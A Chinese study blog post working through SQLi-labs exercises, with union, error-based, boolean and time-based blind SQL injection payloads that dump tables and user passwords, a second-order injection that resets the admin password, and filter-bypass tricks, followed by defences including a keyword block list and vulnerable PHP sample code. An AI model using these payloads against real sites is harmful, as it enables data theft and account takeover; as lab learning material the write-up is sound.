MySQL手工注入學習
SQLi-labs 手工注入學習
以下是通過SLQi-labs平台的部分簡單例題的手工注入過程
Less-1:union聯合查詢注入
頁面提示:Please input the ID as parameter with numeric value
我們首先構造id參數值:
http://192.168.2.198/sqli-labs-master/Less-1/?id=1' or 1=1--+
確定存在注入點,並猜測SQL語句為:
select [字段] from [表] where [id]="$id";
猜解列數:
因為UNION聯合語句函數的格式要求,UNION后的聯合語句的回顯字段數要和UNION前的回顯列數一致……
order by *
union select 1,2,……
爆表:
注意:id的value我們需要給一個不存在結果的value
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
group_concat(): 將group by產生的同一個分組中的值連接起來,返回一個字符串結果
上段~將數據庫中的所有表名拼接成一個字符串返回
爆字段:
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' --+
爆數據:
union select 1,group_concat(id,0x7e,email_id),3 from emails --+
Less-1:報錯注入
爆表:
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))=1 --+
extractvalue(XML,XPath)從目標XML中返回包含查詢值得字符串
參數XML:String格式,為XML文檔對象得名稱
參數XPath:xpath格式得字符串
因為我們在xpath輸入的不是要求的xpath格式的字符串,所以函數會報錯返回xpath參數內容
xpath會被帶入mysql進行執行操作,發現不是xpath格式,但是只有在執行后才會發現,就會執行concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())sql代碼,查詢內容並且concat拼接字符串,隨后由extractvalue函數返回報錯~
爆字段:
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))=1 --+
爆數據:
and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)))=1 --+
從返回的結果發現問題,沒有顯示全部的字段信息;可以利用篩選過濾條件來
and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users where username not in ('Dumb','Angelina'))))=1 --+
利用條件where約束來過濾掉我們已知的字段信息,於是mysql在執行的時候就會越過Dumb和Angelina信息,顯示后面的信息……以此類推!我們就可以通過不斷的條件繞過回顯的模式來獲取所有內容!在很多情況下我們發現無法完全回顯內容,都可以利用這個方法來繞過已知字段信息
Less-2
通過判斷注入點的語句,判斷注入點為數字型注入點:
?id=1 and 1=1 --+ #判斷數字型注入點
?id=1' and 1=1 --+ #判斷字符型注入點
union聯合注入爆表:
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
報錯注入報表:
?id=0 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
Less2的具體攻擊方法和Less1一樣,不同的是Less2是數字型注入,不需要單引號閉合
Less-3
判斷注入點
從報錯信息顯示,我們的id—value寫在SQL語句的括號中,換言之就是,這條SQL語句缺少一個右括號~
確定注入點和方法策略后按照Less1/2的方法UNION/報錯注入方法
Less-4
判斷注入點
?id=1
?id=1'
?id=1')
?id=1" # 報錯…… ^
我們的ID值會放在SQL語句中,且被("$id")包圍
?id=1") --+
手工盲注
按照這回顯,可以認為這是一處盲注……
SQL盲注點 ~~ UNION聯合(回顯)查詢的方法就不可以了……
基於布爾的盲注
?id=1' and left(version(),1)='5' --+
left():從左截取a結果的1個長度的字符
只有當and后面的sql語句為True才不會報錯~……
通過猜解的方式,利用left的方法猜解數據庫的版本信息第一個字符(環境是Mysql 5.1,所以版本信息第一個字符是‘5’)由此推演,我們可以利用布爾的判斷特性來猜解數據庫名……
如上~ 如果我們不斷的對目標進行猜解,就可以得到數據庫名的第一個字符,以此類推第二個字符……第N個字符;數據庫名的長度也可以通過length(database())>=*進行猜解
牢記布爾盲注的特點:只有當and后面的sql語句為True才不會報錯;報錯就表示and后的sql語句不成立……開動腦筋就可以創造奇跡
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 #
ascii(substr((select database()),1,1))=98
substr(a,b,c) 將a結果從b開始截取c長度字符,ascii()將字符轉為ascii值
基於報錯的盲注
XPath報錯注入:
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0x7e) --+
基於時間的盲注
主要思路就是利用時間延遲來判斷布爾條件是否達成,本質上是利用時間延遲來進行布爾和報錯盲注的判斷依據條件;用於沒有任何回顯信息的時候使用~
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判斷語句, 條件為假,
?id=1' and if(ascii(substr(database(),1,1))=96,1,sleep(10)) --+
ascii()負責猜解;if()負責判斷,若是猜解成立則返回1,若是猜解不成立延遲10秒
從報錯結果中,看出注釋符應該被禁了……而且從報錯結果認定布爾和報錯注入是不可舉的!!!
於者乎……時間盲注是最優選擇~~~
當然了……還有在這里說一說文件的導入於導出的方法:
Less-24 二次排序
*- 借鑒sqli-labs-24
分析環境文件:
login.php:查詢數據庫用戶存在和驗證登錄
login.php中使用了mysql_real_escape_string()函數對用戶輸入的字符串進行處理;會將特殊字符進行轉義使之失去效果;但是~之后數據存儲進數據庫后轉義的字符會恢復原樣!
- 黑客通過構造數據的形式, 在瀏覽器或者其他軟件中提交 HTTP 數據報文請求到服務
端進行處理, 提交的數據報文請求中可能包含了黑客構造的 SQL 語句或者命令。 - 服務端應用程序會將黑客提交的數據信息進行存儲, 通常是保存在數據庫中, 保存的
數據信息的主要作用是為應用程序執行其他功能提供原始輸入數據並對客戶端請求做出響
應。 - 黑客向服務端發送第二個與第一次不相同的請求數據信息。
- 服務端接收到黑客提交的第二個請求信息后, 為了處理該請求, 服務端會查詢數據中已經存儲的數據信息並處理, 從而導致黑客在第一次請求中構造的 SQL 語句或者命令在服務端環境中執行。
- 服務端返回執行的處理結果數據信息, 黑客可以通過返回的結果數據信息判斷二次注
入漏洞利用是否成功。
在login_create.php注冊頁面中,使用了mysql_real_escape_string()但是數據還是會被存放在數據庫中……
數據會被完整的記錄在數據庫中
數據庫中有了我們的“小玩意”之后……
登錄我們的賬戶,因為我們的賬戶是以admin'#保存的,固然要這樣的去訪問和登錄
前端提交user和pass后,會在修改密碼頁面修改密碼
就這樣我們成功的修改了admin的密碼!為啥呢?
Sql 語句變為 UPDATE users SET passwd=”New_Pass” WHERE username =’ admin’ # ‘ AND password=’
也 就 是 執 行 了 UPDATE users SET passwd=”New_Pass” WHERE sername =’admin’
利用注冊的admin’# 修改密碼時候從數據庫提取該數據 造成了數據 命令拼接
注入漏洞可以做哪些?
SQL注入可以做什么?如果從一個普通人的角度看,第一想起的就是“萬能密碼”即通過構造SQL注入語句繞過密碼驗證。
-
獲取數據庫信息
發現SQL注入點后,通過猜解的方式獲取當前數據庫的庫結構、表結構、字段內容,並通過Payload獲取服務器的物理路徑信息、用戶信息、敏感數據信息等,如果成功的獲得了數據庫或服務器的高權限就可以“拖庫”。
-
寫入Shell
通過SQL注入漏洞執行寫文件操作(寫入Shell),例如:
loadfile()into outfile等函數都可以實現讀寫本地文件。當然讀寫文件的先決條件:文件的讀寫權限、文件為可讀屬性、了解文件的物理路徑等。
SQL注入防御策略
本文的SQL注入防御將會基於“常見SQL注入環境搭建(by:Mirror王宇陽)”中的搭建的環境做出防御措施。
過濾敏感字符
將常用的SQL注入字符寫入到黑名單中,然后通過程序對用戶提交的POST、GET請求以及請求中的各個字段都進行過濾檢查,篩選威脅字符。
# 部分敏感字符和字符串
delete from|from|count\(|drop table|update|truncate|mid\(|char\(|xp_cmdshell|exec master|netlocalgroup administrators|net user|[\{|\}|!|\']
# 前端處理
var str = "select * from table where id=123";
var reg = /(.*?((select)|(from)|(count)|(delete)|(update)|(drop)|(truncate)).*?){2,}/i;
return(reg.test(str));
在字符過濾方面,通常過濾空格、括號、引號……等特殊字符,但是這些可以繞過的:
舉例:過濾空格 select/**/name/**/from/**/user/**/where/**/id='kk' 或 select(name)from(user)where(id='kk')通過這種方法就會規避對空格的過濾;過濾括號和引號select name from user wehere id=0x6b6b0x6b6b(kk的十六進制)
限制查詢長度
由於SQL注入過程中需要構造較長的SQL語句,因此,一些特定的程序可以使用限制用戶提交的請求內容的長度來達到防御SQL注入的目的,但這種效果並不好。
// 接收參數text
if(isset($_GET['text']) && strlen($_GET['text']) < 10){
$text=$_GET['text'];
} else {
echo "輸入內容不符規范";
}
設置數據庫權限
根據程序要求為特定的表設置特定的權限,如:某段程序對某表只需具備select權限即可,這樣即使程序存在問題,惡意用戶也無法對表進行update或insert等寫入操作。
限制目錄權限
WEB目錄應至少遵循“可寫目錄不可執行,可執行目錄不可寫”的原則,在次基礎上,對各目錄進行必要的權限細化。
限制數據類型
因為PHP語言沒有嚴格的限制數據類型的定義例如:“ID=1 就默認ID為Intger ; name=kk 默認name為string”在PHP的弱類型管理中這是不安全的。
舉例:
// 接收參數text
if(isset($_GET['text'])){
$text=$_GET['text'];
}
// 拼接sql語句並執行
$sql="SELECT * FROM admin WHERE uid='$text' LIMIT 0,1";
echo 'SQL拼接結果:'.$sql;
echo '<hr>';
// 執行sql語句並返回結果
$result=mysqli_query($conn, $sql);
這里的text參數沒有限制我們的輸入,理論上我們的輸入應該限制為“Intger”;當text接到' union select 1,database(),version(),4; -- +參數后就會自動推導text為“String”類型並拼接為SQL語句。
這里可以使用is_numeric() \ ctype_digit()函數判斷數據類型
is_numeric():檢測變量是否為數字或數字字符串;指定的變量是數字和數字字符串則返回 TRUE,否則返回 FALSE。
if(isset($_GET['text']) && is_numeric($_GET['text'])){
$text=$_GET['text'];
} else {
echo "輸入內容不符規范";
}
ctype_digit():純數字檢測;對指定的變量檢測判斷是否為連續且純數字的字符串(字符串離全為數字)。
if(isset($_GET['text']) && ctype_digit($_GET['text'])){
$text=$_GET['text'];
} else {
echo "輸入內容不符規范";
}
缺陷:
這里只可以有效的預防數字型的注入點,而String類型的注入點此方法則無效。
限制特殊字符
在字符型注入點,任何惡意的SQL攻擊都會包含一些特殊的字符,例如空格、括號、引號……等。如果存在敏感的特殊字符,需要使用字符轉義。
- 過濾特殊字符函數:
function safe_replace($string)
{
$string = str_replace('%20', '', $string);
$string = str_replace('%27', '', $string);
$string = str_replace('%2527', '', $string);
$string = str_replace('*', '', $string);
$string = str_replace('"', '"', $string);
$string = str_replace("'", '', $string);
$string = str_replace('"', '', $string);
$string = str_replace(';', '', $string);
$string = str_replace('<', '<', $string);
$string = str_replace('>', '>', $string);
$string = str_replace("{", '', $string);
$string = str_replace('}', '', $string);
…… …… …… ……
return $string;
}
- mysql_real_escape_string()函數:
對一些例如單引號、雙引號、反斜杠等特殊字符添加一個反斜杠以確保在查詢這些數據之前,用戶提供的輸入是干凈的。但要注意,你是在連接數據庫的前提下使用這個函數。
- addslashes()
這個函數的原理跟mysql_real_escape_string()相似。但是當在php.ini文件中,“magic_quotes_gpc“的值是“on”的時候,就不要使用這個函數。magic_quotes_gpc 的默認值是on,對所有的 GET、POST 和 COOKIE 數據自動運行 addslashes()。不要對已經被 magic_quotes_gpc 轉義過的字符串使用 addslashes(),因為這樣會導致雙層轉義。你可以使用get_magic_quotes_gpc()函數來確定它是否開啟。
- htmlentities()
這個函數對於過濾用戶輸入的數據非常有用。它會將一些特殊字符轉換為HTML實體。例如,用戶輸入<時,就會被該函數轉化為HTML實體<(<),輸入>就被轉為實體>.(HTML實體對照表:http://www.w3school.com.cn/html/html_entities.asp),可以防止XSS和SQL注入攻擊。
- htmlspecialchars()
在HTML中,一些特定字符有特殊的含義,如果要保持字符原來的含義,就應該轉換為HTML實體。這個函數會返回轉換后的字符串,例如‘&’ (ampersand) 轉為’&‘(ps:請參照第三點中的實體對照表鏈接)
- strip_tags()
這個函數可以去除字符串中所有的HTML,JavaScript和PHP標簽,當然你也可以通過設置該函數的第二個參數,讓一些特定的標簽出現。
筆者在學習SQL注入期間了解的注入防御策略很少,可能也是實踐的操作還是太少、代碼基礎仍有欠缺……By:Mirror王宇陽